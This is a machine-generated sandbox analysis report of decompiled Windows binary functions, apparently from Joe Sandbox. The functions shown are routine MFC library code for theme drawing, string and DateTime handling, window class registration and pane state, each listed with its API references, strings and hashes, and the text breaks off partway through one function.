Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Global$ByteCharLockMultiUnlockWide_strlen
String ID: System
API String ID: 3423807218-3470857405
Opcode ID: 757015114b04e6329c83ec98e1af882e2e4d6db05dd93c9db2d4a95324892261
Instruction ID: 4f9cf0957a9c4e172782e8e52c596466d9ae891ff06c3cc792fb5e919d210d6f
Opcode Fuzzy Hash: 757015114b04e6329c83ec98e1af882e2e4d6db05dd93c9db2d4a95324892261
Instruction Fuzzy Hash: E9519F71E002199FCB14DFA8CC84FAEBBB4FF44714F24812EE415EB285D77499458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6294 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00CE6294(void* __ebx, signed int __ecx, intOrPtr __edi, signed int __esi, void* __eflags) {
				intOrPtr _t53;
				intOrPtr _t64;
				intOrPtr* _t75;
				signed int _t86;
				void* _t106;

				_t103 = __esi;
				_t101 = __edi;
				_t86 = __ecx;
				_push(0x1c);
				E00DDD55F(0xe0acb3, __ebx, __edi, __esi);
				 *(_t106 - 0x28) = __ecx;
				_t85 =  *((intOrPtr*)(_t106 + 8));
				 *((intOrPtr*)(_t106 - 0x24)) = _t85;
				if( *((intOrPtr*)(__ecx + 0x1c)) != 0) {
					if(_t85 != 0) {
						_t53 =  *((intOrPtr*)(_t85 + 4));
					} else {
						_t53 = 0;
					}
					__imp__DrawThemeBackground( *((intOrPtr*)(_t86 + 0x1c)), _t53, 1, 0, _t106 + 0x10, 0);
					if( *(_t106 + 0x20) != 0) {
						_t101 = _t106 - 0x20;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						InflateRect(_t106 - 0x20, 0xfffffffd, 0xfffffffd);
						_t103 =  *(_t106 + 0x24);
						asm("cdq");
						 *((intOrPtr*)(_t106 - 0x18)) = ( *((intOrPtr*)(_t106 - 0x18)) -  *(_t106 - 0x20)) *  *(_t106 + 0x24) /  *(_t106 + 0x20) +  *(_t106 - 0x20);
						if(_t85 != 0) {
							_t64 =  *((intOrPtr*)(_t85 + 4));
						} else {
							_t64 = 0;
						}
						__imp__DrawThemeBackground( *((intOrPtr*)( *(_t106 - 0x28) + 0x1c)), _t64, 3, 0, _t106 - 0x20, 0);
						if( *((intOrPtr*)(_t106 + 0x34)) != 0) {
							E00CA67E1(_t106 - 0x28);
							 *(_t106 - 4) =  *(_t106 - 4) & 0x00000000;
							asm("cdq");
							E00CA6953(_t106 - 0x28, "%d%%", _t103 * 0x64 /  *(_t106 + 0x20));
							 *0xe17a64( *((intOrPtr*)(E00CC19ED() + 0x28)));
							_t75 =  *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x30))))();
							_t85 = _t75;
							_t103 =  *(_t106 - 0x28);
							 *0xe17a64(_t103,  *((intOrPtr*)(_t103 - 0xc)), _t106 + 0x10, 0x25);
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t106 - 0x24)))) + 0x68))();
							_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t106 - 0x24)))) + 0x30));
							 *0xe17a64(_t75);
							E00CA2975( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t106 - 0x24)))) + 0x30))))(), _t103 - 0x10);
						}
					}
				}
				return E00DDD50E(_t85, _t101, _t103);
			}

0x00ce6294
0x00ce6294
0x00ce6294
0x00ce6294
0x00ce629b
0x00ce62a0
0x00ce62a7
0x00ce62aa
0x00ce62ad
0x00ce62b8
0x00ce62be
0x00ce62ba
0x00ce62ba
0x00ce62ba
0x00ce62cf
0x00ce62d9
0x00ce62e2
0x00ce62e5
0x00ce62ee
0x00ce62ef
0x00ce62f0
0x00ce62f1
0x00ce62fd
0x00ce6303
0x00ce630a
0x00ce630f
0x00ce6315
0x00ce6311
0x00ce6311
0x00ce6311
0x00ce6329
0x00ce6333
0x00ce633c
0x00ce6344
0x00ce6348
0x00ce6356
0x00ce636e
0x00ce6376
0x00ce637b
0x00ce637d
0x00ce638f
0x00ce6398
0x00ce63a1
0x00ce63a6
0x00ce63b4
0x00ce63b4
0x00ce6333
0x00ce63bb
0x00ce63c1

APIs

__EH_prolog3_GS.LIBCMT ref: 00CE629B
DrawThemeBackground.UXTHEME(00000000,?,00000001,00000000,?,00000000,?,?,?,?,?,?,?,0000001C), ref: 00CE62CF
InflateRect.USER32(?,000000FD,000000FD), ref: 00CE62F1
DrawThemeBackground.UXTHEME(00000000,?,00000003,00000000,?,00000000,?,?,?,?,?,?,?,?,0000001C), ref: 00CE6329

Strings

%d%%, xrefs: 00CE6350

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: BackgroundDrawTheme$H_prolog3_InflateRect
String ID: %d%%
API String ID: 1553386484-1518462796
Opcode ID: 1dbb3fe9b4b4041cab779a81cc4102a8ef3565a67ba3ce808d2b3b660368f8fb
Instruction ID: 84b480dae540c25aa3c211dabe376b43177f7d29ea426cafd70cb2dfc135cca1
Opcode Fuzzy Hash: 1dbb3fe9b4b4041cab779a81cc4102a8ef3565a67ba3ce808d2b3b660368f8fb
Instruction Fuzzy Hash: 2B4117726102199FDB00DFA5CC85BED77B5BF59714F140468E911BB2A1DB70EE04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8BB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00CD8BB5(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t46;
				void* _t49;
				intOrPtr _t59;
				signed int _t64;
				intOrPtr _t70;
				intOrPtr _t82;
				intOrPtr _t83;
				signed int _t84;
				intOrPtr _t87;
				void* _t89;
				void* _t95;

				_push(0x50);
				E00DDD52C(0xe0a47f, __ebx, __edi, __esi);
				_t46 =  *((intOrPtr*)(_t89 + 8));
				_t70 =  *((intOrPtr*)(_t89 + 0xc));
				 *((intOrPtr*)(_t89 - 0x1c)) = _t46;
				_t87 = 0;
				 *((intOrPtr*)(_t89 - 4)) = 0;
				if(_t46 == 0) {
					L9:
					_t49 = E00CC1854(_t70, _t89 + 0x18, _t89 + 0x1c,  *((intOrPtr*)(_t89 + 0x2c)));
					 *((intOrPtr*)(_t89 - 0x18)) = _t87;
				} else {
					_t95 = E00CD8F9F(__ecx);
					if(_t95 == 0) {
						goto L9;
					} else {
						E00CBBA5C(_t53, _t70, _t89 - 0x10, __esi,  *((intOrPtr*)(_t89 + 0x18)));
						 *((intOrPtr*)(_t89 - 0x18)) = 1;
						 *((char*)(_t89 - 4)) = 1;
						__imp__#7( *((intOrPtr*)(_t89 - 0x10)));
						_t84 = 2;
						_t59 = E00CA95C0(_t95);
						 *((intOrPtr*)(_t89 - 0x14)) = _t59;
						__imp__#7( *((intOrPtr*)(_t89 - 0x10)),  ~(0 | _t95 > 0x00000000) | 1 * _t84);
						E00DEC133( *((intOrPtr*)(_t89 - 0x14)), _t59 + 1,  *((intOrPtr*)(_t89 - 0x10)));
						E00DDFBE0(0, _t89 - 0x5c, 0, 0x40);
						_t82 =  *((intOrPtr*)(_t89 + 0x30));
						 *((intOrPtr*)(_t89 - 0x5c)) = 0x40;
						_t64 = 0x2000;
						 *(_t89 - 0x58) = 0x2000;
						if(_t82 > 0) {
							_t64 = 0x2800;
							 *((intOrPtr*)(_t89 - 0x28)) = _t82;
							 *(_t89 - 0x58) = 0x2800;
						}
						_t83 =  *((intOrPtr*)(_t89 + 0x34));
						if(_t83 != 0xffffffff) {
							 *((intOrPtr*)(_t89 - 0x54)) = _t83;
							 *(_t89 - 0x58) = _t64 | 0x00000001;
						}
						if(_t70 != 0) {
							_t87 =  *((intOrPtr*)(_t70 + 4));
						}
						E00CBCBC4( *((intOrPtr*)(_t89 - 0x1c)), _t87,  *((intOrPtr*)(_t89 + 0x10)),  *((intOrPtr*)(_t89 + 0x14)),  *((intOrPtr*)(_t89 - 0x14)), 0xffffffff,  *((intOrPtr*)(_t89 + 0x2c)), _t89 + 0x1c, _t89 - 0x5c);
						_t49 = L00CA95BB( *((intOrPtr*)(_t89 - 0x14)));
						__imp__#6( *((intOrPtr*)(_t89 - 0x10)));
					}
				}
				E00CA2975(_t49,  *((intOrPtr*)(_t89 + 0x18)) + 0xfffffff0);
				return E00DDD4FA( *((intOrPtr*)(_t89 - 0x18)));
			}

0x00cd8bb5
0x00cd8bbc
0x00cd8bc1
0x00cd8bc4
0x00cd8bc7
0x00cd8bca
0x00cd8bcc
0x00cd8bd1
0x00cd8cac
0x00cd8cb9
0x00cd8cbe
0x00cd8bd7
0x00cd8bdc
0x00cd8bde
0x00000000
0x00cd8be4
0x00cd8bea
0x00cd8bf5
0x00cd8bf8
0x00cd8bfb
0x00cd8c06
0x00cd8c11
0x00cd8c1a
0x00cd8c1d
0x00cd8c2b
0x00cd8c37
0x00cd8c3c
0x00cd8c42
0x00cd8c49
0x00cd8c4e
0x00cd8c53
0x00cd8c55
0x00cd8c5a
0x00cd8c5d
0x00cd8c5d
0x00cd8c60
0x00cd8c66
0x00cd8c6b
0x00cd8c6e
0x00cd8c6e
0x00cd8c73
0x00cd8c75
0x00cd8c75
0x00cd8c93
0x00cd8c99
0x00cd8ca4
0x00cd8ca4
0x00cd8bde
0x00cd8cc7
0x00cd8cd4

APIs

__EH_prolog3.LIBCMT ref: 00CD8BBC
SysStringLen.OLEAUT32(?), ref: 00CD8BFB
SysStringLen.OLEAUT32(?), ref: 00CD8C1D
SysFreeString.OLEAUT32(?), ref: 00CD8CA4

Strings

@, xrefs: 00CD8C42

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: String$FreeH_prolog3
String ID: @
API String ID: 315669285-2766056989
Opcode ID: dacd87f037845acf604af98a30627f8f087ab9370d12ebf40dc7d24bf2cd4748
Instruction ID: d36b22e4cbc2f68ce2fa51fe340e38ade37d1ad76884333e5b55623e4ff3f94c
Opcode Fuzzy Hash: dacd87f037845acf604af98a30627f8f087ab9370d12ebf40dc7d24bf2cd4748
Instruction Fuzzy Hash: 9231817190014AAFDF05DFA5CC829EF7BB9EF44304F10412AFA25A6291DB308A15DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CAEFD1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00CAEFD1(void* __ebx, long long* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t37;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t54;
				intOrPtr _t80;
				intOrPtr* _t84;
				void* _t85;
				long long* _t86;

				_push(0xc);
				E00DDD52C(0xe08657, __ebx, __edi, __esi);
				_t88 =  *((intOrPtr*)(__ecx + 8)) - 2;
				if( *((intOrPtr*)(__ecx + 8)) != 2) {
					__eflags =  *((intOrPtr*)(__ecx + 8)) - 1;
					if( *((intOrPtr*)(__ecx + 8)) != 1) {
						 *(_t85 - 0x10) =  *(_t85 - 0x10) & 0x00000000;
						 *(_t85 - 4) = 1;
						_t37 = _t85 - 0x10;
						 *_t86 =  *__ecx;
						__imp__#114(__ecx, __ecx,  *((intOrPtr*)(_t85 + 0x10)),  *((intOrPtr*)(_t85 + 0xc)), _t37);
						__eflags = _t37;
						if(__eflags >= 0) {
							_push( *(_t85 - 0x10));
							E00CA9617(__ebx, _t85 - 0x18, __edi, __esi, __eflags);
							 *(_t85 - 4) = 3;
							_push( *((intOrPtr*)(_t85 - 0x18)) + 0xfffffff0);
							_t41 = E00CA68F8(__ebx, __edi, __esi);
							_t63 =  *((intOrPtr*)(_t85 - 0x18)) + 0xfffffff0;
							__eflags =  *((intOrPtr*)(_t85 - 0x18)) + 0xfffffff0;
							goto L12;
						} else {
							E00CA67E1(_t85 - 0x14);
							 *(_t85 - 4) = 2;
							__eflags = E00CA2A90(_t85 - 0x14, 0xd800);
							if(__eflags == 0) {
								E00CA2975(E00CA2ABC(__ebx,  *((intOrPtr*)(_t85 + 8)), __edi, __esi, __eflags),  *((intOrPtr*)(_t85 - 0x14)) + 0xfffffff0);
								__imp__#6( *(_t85 - 0x10), "Invalid DateTime");
								goto L2;
							} else {
								_t80 =  *((intOrPtr*)(_t85 - 0x14)) + 0xfffffff0;
								_push(_t80);
								_t41 = E00CA68F8(__ebx, _t80, __esi);
								_t63 = _t80;
								L12:
								_t84 =  *((intOrPtr*)(_t85 + 8));
								_t42 = _t41 + 0x10;
								__eflags = _t42;
								 *_t84 = _t42;
								E00CA2975(_t42, _t63);
								__imp__#6( *(_t85 - 0x10));
								goto L13;
							}
						}
					} else {
						E00CA67E1(_t85 - 0x14);
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						__eflags = E00CA2A90(_t85 - 0x14, 0xd800);
						if(__eflags == 0) {
							_push("Invalid DateTime");
							E00CA2975(E00CA2ABC(__ebx,  *((intOrPtr*)(_t85 + 8)), __edi, __esi, __eflags),  *((intOrPtr*)(_t85 - 0x14)) + 0xfffffff0);
							goto L2;
						} else {
							_push( *((intOrPtr*)(_t85 - 0x14)) + 0xfffffff0);
							_t54 = E00CA68F8(__ebx,  *((intOrPtr*)(_t85 - 0x14)) + 0xfffffff0, __esi);
							_t84 =  *((intOrPtr*)(_t85 + 8));
							 *_t84 = _t54 + 0x10;
							E00CA2975(_t54 + 0x10,  *((intOrPtr*)(_t85 - 0x14)) + 0xfffffff0);
							L13:
							_t44 = _t84;
						}
					}
				} else {
					_push(0xe4bcbb);
					E00CA2ABC(__ebx,  *((intOrPtr*)(_t85 + 8)), __edi, __esi, _t88);
					L2:
					_t44 =  *((intOrPtr*)(_t85 + 8));
				}
				return E00DDD4FA(_t44);
			}

0x00caefd1
0x00caefd8
0x00caefdd
0x00caefe1
0x00caeffb
0x00caeffe
0x00caf058
0x00caf05e
0x00caf061
0x00caf06d
0x00caf070
0x00caf076
0x00caf078
0x00caf0ce
0x00caf0d4
0x00caf0df
0x00caf0e3
0x00caf0e4
0x00caf0ed
0x00caf0ed
0x00000000
0x00caf07a
0x00caf07d
0x00caf08a
0x00caf093
0x00caf095
0x00caf0bb
0x00caf0c3
0x00000000
0x00caf097
0x00caf09a
0x00caf09d
0x00caf09e
0x00caf0a4
0x00caf0f0
0x00caf0f0
0x00caf0f3
0x00caf0f3
0x00caf0f6
0x00caf0f8
0x00caf100
0x00000000
0x00caf100
0x00caf095
0x00caf000
0x00caf003
0x00caf008
0x00caf019
0x00caf01b
0x00caf041
0x00caf051
0x00000000
0x00caf01d
0x00caf023
0x00caf024
0x00caf029
0x00caf032
0x00caf034
0x00caf106
0x00caf106
0x00caf106
0x00caf01b
0x00caefe3
0x00caefe6
0x00caefeb
0x00caeff0
0x00caeff0
0x00caeff0
0x00caf10d

APIs

__EH_prolog3.LIBCMT ref: 00CAEFD8

Part of subcall function 00CA2ABC: __EH_prolog3.LIBCMT ref: 00CA2AC3

Strings

Invalid DateTime, xrefs: 00CAF041, 00CAF0AB

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3
String ID: Invalid DateTime
API String ID: 431132790-2190634649
Opcode ID: 393509142722fe743bb827f247e5fb9c6eccbfdec8fdc13c080a5d289ad39010
Instruction ID: c8d55f9fed9bd516bdcd70ec9a11c59924ceff0b0d503404b7a8fdb31b14c191
Opcode Fuzzy Hash: 393509142722fe743bb827f247e5fb9c6eccbfdec8fdc13c080a5d289ad39010
Instruction Fuzzy Hash: 5531693190011B9BCF14EBA8CC46ABE7775EF42318F244519F561AB2D2DF309E05EB65

Uniqueness

Uniqueness Score: -1.00%

Function 00CB123A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00CB123A(void* __ecx, void* __edx, void* __eflags, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				struct _WNDCLASSA _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t34;
				intOrPtr* _t36;
				intOrPtr* _t37;
				int _t39;
				intOrPtr* _t53;
				void* _t55;
				struct HINSTANCE__* _t56;
				void* _t59;
				void* _t60;
				intOrPtr _t61;
				void* _t62;
				CHAR* _t63;

				_t59 = __edx;
				_t1 = E00CACF3C(_t55, _t60, _t62, __eflags) + 0x7c; // 0x7c
				_t63 = _t1;
				_t56 =  *(E00CACEEE(_t55, _t60, _t63, __eflags) + 8);
				if(_a8 != 0 || _a12 != 0) {
					L4:
					_v8 =  *((intOrPtr*)(E00DE58BA(__eflags)));
					_t34 = E00DE58BA(__eflags);
					_push(_a16);
					_t61 = 0;
					__eflags = 0;
					_push(_a12);
					 *_t34 = 0;
					_push(_a8);
					_push(_a4);
					E00CB754A(_t63, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t56);
					goto L5;
				} else {
					_t70 = _a16;
					if(_a16 != 0) {
						goto L4;
					}
					_v8 =  *((intOrPtr*)(E00DE58BA(_t70)));
					_t53 = E00DE58BA(_t70);
					_push(_a4);
					_t61 = 0;
					 *_t53 = 0;
					E00CB754A(_t63, 0x60, 0x5f, "Afx:%p:%x", _t56);
					L5:
					_t36 = E00DE58BA(_t70);
					_t71 =  *_t36 - _t61;
					if( *_t36 == _t61) {
						_t37 = E00DE58BA(__eflags);
						_t58 = _v8;
						 *_t37 = _v8;
					} else {
						E00CA9BCD(_t56, _t61, _t63,  *((intOrPtr*)(E00DE58BA(_t71))));
						_pop(_t58);
					}
					_t39 = GetClassInfoA(_t56, _t63,  &_v48);
					_t72 = _t39;
					if(_t39 == 0) {
						_v48.style = _a4;
						_v48.lpfnWndProc = DefWindowProcA;
						_v48.hIcon = _a16;
						_v48.hCursor = _a8;
						_v48.hbrBackground = _a12;
						_push( &_v48);
						_v48.cbWndExtra = _t61;
						_v48.cbClsExtra = _t61;
						_v48.hInstance = _t56;
						_v48.lpszMenuName = _t61;
						_v48.lpszClassName = _t63;
						if(E00CB119B(_t56, _t58, _t61, _t63, _t72) == 0) {
							E00CB9B50(_t56, _t58, _t59);
						}
					}
					return _t63;
				}
			}

0x00cb123a
0x00cb1248
0x00cb1248
0x00cb1254
0x00cb1257
0x00cb1290
0x00cb1297
0x00cb129a
0x00cb129f
0x00cb12a2
0x00cb12a2
0x00cb12a4
0x00cb12a7
0x00cb12a9
0x00cb12ac
0x00cb12ba
0x00000000
0x00cb125f
0x00cb125f
0x00cb1263
0x00000000
0x00000000
0x00cb126c
0x00cb126f
0x00cb1274
0x00cb1277
0x00cb1284
0x00cb1286
0x00cb12c2
0x00cb12c2
0x00cb12c7
0x00cb12c9
0x00cb12da
0x00cb12df
0x00cb12e2
0x00cb12cb
0x00cb12d2
0x00cb12d7
0x00cb12d7
0x00cb12ea
0x00cb12f0
0x00cb12f2
0x00cb12f7
0x00cb12ff
0x00cb1305
0x00cb130b
0x00cb1311
0x00cb1317
0x00cb1318
0x00cb131b
0x00cb131e
0x00cb1321
0x00cb1324
0x00cb132e
0x00cb1330
0x00cb1330
0x00cb132e
0x00cb133b
0x00cb133b

APIs

__snprintf_s.LIBCMT ref: 00CB1286

Part of subcall function 00CB754A: __vsnwprintf_s_l.LEGACY_STDIO_DEFINITIONS ref: 00CB755F

__snprintf_s.LIBCMT ref: 00CB12BA
GetClassInfoA.USER32 ref: 00CB12EA

Strings

Afx:%p:%x:%p:%p:%p, xrefs: 00CB12B0
Afx:%p:%x, xrefs: 00CB127A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: __snprintf_s$ClassInfo__vsnwprintf_s_l
String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
API String ID: 2864017905-2801496823
Opcode ID: d98ed26fa2d9cbfc7126335754866c02a82d23c291dfd6631c2443fb7be20b31
Instruction ID: 3530c36ebc37654a24f6d3a6da6c58e025b182492dd6caf409bc1af29f1f9502
Opcode Fuzzy Hash: d98ed26fa2d9cbfc7126335754866c02a82d23c291dfd6631c2443fb7be20b31
Instruction Fuzzy Hash: 19316174900249AFDF10EFAAD885ADEBBF9EF49354F004026F914A7261D7748A50DFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE11CD Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00CE11CD(intOrPtr __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr* _t39;
				intOrPtr* _t42;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr* _t75;
				intOrPtr _t80;
				intOrPtr _t81;
				void* _t82;
				void* _t87;

				_t87 = __eflags;
				E00DDD52C(0xe0ab13, __ebx, __edi, __esi);
				_t75 = __ecx;
				 *((intOrPtr*)(_t82 - 0x1c)) = __ecx;
				E00D52263(__ebx, __ecx, __esi, _t87, _t82 - 0x18, "BasePanes",  *((intOrPtr*)(_t82 + 8)), 0x18);
				_t80 =  *((intOrPtr*)(_t82 + 0xc));
				_t56 = 0;
				 *((intOrPtr*)(_t82 - 4)) = 0;
				if(_t80 == 0xffffffff) {
					_t80 = E00CB7697(_t75);
				}
				E00CA67E1(_t82 - 0x10);
				_t37 = _t82 - 0x10;
				 *((char*)(_t82 - 4)) = 1;
				if( *((intOrPtr*)(_t82 + 0x10)) != 0xffffffff) {
					_push( *((intOrPtr*)(_t82 + 0x10)));
					_push(_t80);
					E00CA6953(_t37, "%TsBasePane-%d%x",  *((intOrPtr*)(_t82 - 0x18)));
				} else {
					_push(_t80);
					E00CA6953(_t37, "%TsBasePane-%d",  *((intOrPtr*)(_t82 - 0x18)));
				}
				 *((intOrPtr*)(_t82 - 0x24)) = _t56;
				 *((intOrPtr*)(_t82 - 0x20)) = _t56;
				 *((char*)(_t82 - 4)) = 2;
				_t39 = E00D52432(_t82 - 0x24, _t56, 1);
				_t81 =  *((intOrPtr*)(_t82 - 0x10));
				 *((intOrPtr*)(_t82 - 0x14)) = _t39;
				 *0xe17a64(_t81);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t39 + 0x10))))() != 0) {
					_t57 =  *((intOrPtr*)(_t82 - 0x1c));
					 *0xe17a64("IsVisible", _t57 + 0x84);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t82 - 0x14)))) + 0x54))))();
					 *((intOrPtr*)(_t57 + 0x88)) = 1;
					_t56 = 1;
				}
				_t42 =  *((intOrPtr*)(_t82 - 0x24));
				if(_t42 != 0) {
					 *0xe17a64(1);
					_t42 =  *((intOrPtr*)( *((intOrPtr*)( *_t42 + 4))))();
				}
				_t30 = _t81 - 0x10; // 0xef
				E00CA2975(E00CA2975(_t42, _t30),  *((intOrPtr*)(_t82 - 0x18)) + 0xfffffff0);
				return E00DDD4FA(_t56);
			}

0x00ce11cd
0x00ce11d4
0x00ce11d9
0x00ce11db
0x00ce11ea
0x00ce11f2
0x00ce11f5
0x00ce11f7
0x00ce11fd
0x00ce1206
0x00ce1206
0x00ce120b
0x00ce1214
0x00ce1217
0x00ce121b
0x00ce1231
0x00ce1234
0x00ce123e
0x00ce121d
0x00ce121d
0x00ce1227
0x00ce122c
0x00ce1246
0x00ce1249
0x00ce1252
0x00ce1256
0x00ce125b
0x00ce125f
0x00ce1269
0x00ce1276
0x00ce127b
0x00ce1291
0x00ce129a
0x00ce129c
0x00ce12a8
0x00ce12a8
0x00ce12a9
0x00ce12ae
0x00ce12b9
0x00ce12c2
0x00ce12c2
0x00ce12c4
0x00ce12d2
0x00ce12de

APIs

__EH_prolog3.LIBCMT ref: 00CE11D4

Part of subcall function 00D52263: __EH_prolog3.LIBCMT ref: 00D5226A
Part of subcall function 00D52263: _strlen.LIBCMT ref: 00D522A1

Part of subcall function 00CB7697: GetDlgCtrlID.USER32 ref: 00CB76A2

Strings

%TsBasePane-%d, xrefs: 00CE1221
IsVisible, xrefs: 00CE1287
BasePanes, xrefs: 00CE11E4
%TsBasePane-%d%x, xrefs: 00CE1238

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3$Ctrl_strlen
String ID: %TsBasePane-%d$%TsBasePane-%d%x$BasePanes$IsVisible
API String ID: 2012836349-2169875744
Opcode ID: 62a97ef28848b7f9da7033ee0e0809166f224aa5b858d143f62d58c7e162779f
Instruction ID: 2cd81125094968ab813e3238fbc42edc30c3c7116bd5c9cb08d2dcbc3a55a8bb
Opcode Fuzzy Hash: 62a97ef28848b7f9da7033ee0e0809166f224aa5b858d143f62d58c7e162779f
Instruction Fuzzy Hash: 07317C71A0020A9BCF00EFA5C8819EEBBB5AF49314F180169E925B73D1CB30AE45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB809D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00CB809D(void** __ecx, char* _a4) {
				char _v16;
				signed int _t9;
				long _t12;
				struct HINSTANCE__* _t14;
				intOrPtr* _t25;
				signed int _t27;

				_push(0xffffffff);
				_push(E00E07AA4);
				_push( *[fs:0x0]);
				_t9 =  *0xe68dd4; // 0x8d2643c2
